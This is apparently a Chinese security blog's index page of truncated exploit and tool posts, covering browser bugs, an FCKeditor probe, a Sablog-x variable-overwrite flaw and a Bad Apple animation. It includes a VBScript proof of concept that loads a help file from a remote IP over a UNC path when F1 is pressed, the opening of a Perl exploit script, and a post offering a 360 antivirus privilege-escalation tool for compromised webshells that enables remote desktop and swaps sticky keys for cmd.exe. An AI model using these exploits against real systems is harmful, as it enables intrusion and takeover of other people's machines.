分类: 工具收集

来源：woyigui 大牛的作品应该很不错 以下是功能介绍 1.全面支持HTTP类型     * 支持HTTP 1.0/1.1；     * 支持POST/GET /Cookie方法；     * 支持Basic/NTLM /Digest验证；     * 支持基于公钥或者私钥的 ReadMore

测试代码： <html> <script type="text/vbscript"> big = "\\184.73.14.110\PUBLIC\test.hlp" //For i=1 to 2500 //  big = big & "\..\" //Next MsgBox "please press F1 to save the world", ,"please save the world", big, 1 MsgBox "press F1 to close this annoying popup", ,"", big, ReadMore

查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————————————————————————————————————— 2. Version 2.2 版本 Apache+linux ReadMore

作者：xisigr 测试版本：搜狗浏览器版本：1.4.0.418(正式版) 漏洞成因：在搜狗浏览器中，window.location和document.write两个函数发生条件竞争阻 ReadMore

利用代码： #!/usr/bin/perl use strict; use Socket; use IO::Socket; print "\n"; print "800008                           8                      \n"; print "8      e  eeeee eeeeeee eeeee    8     eeeee eeeee  eeeee\n"; print "8eeeee ReadMore

作者：80vul-B 一 描叙： 由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞，导致可以利用extract()来覆盖任意变量，最终导致xss、sql注射、代码执行等很多严重的安全漏洞。 二 分析 common.inc.php代码里： .... $onoff = ReadMore

作者：oldjun 不知道该说什么好了，以前拿了很多shell，一直懒得提权，一是没那个必要，二是提权太累了，三是服务器类型的肉鸡多了也没啥用。不过要是能让我一下子就成功提权，何乐而不为呢？ 于是360本地提权来了，最近已经沸沸扬扬的了，不多发表过多评论，只是觉得做公司更要厚道；本人菜另外还有很多兄弟在360，不说什么了，发了本地提权的利用程序吧。friddy那里已经有一份了，是用来替换5下shift为cmd.exe的360本地提权webshell下测试程序。 瑞星说是“bregdrv.sys和bregdll.dll”出的问题，然后http://www.sebug.net/exploit/19048/这个poc也是直接load这个dll的，于是这个利用程序也是基于这个的。webshell下使用，guest权限即可，需要Wscript.shell支持，功能主要是： 1.开启终端服务，端口为3389；用法：360.exe ReadMore

今天在网上看到一个很有意思的东西，于是就收集下来了，用字符播放动画！ 这个是批处理版的，网页版的请点击 BadApple网页版 下载：Bad Apple批处理版 ReadMore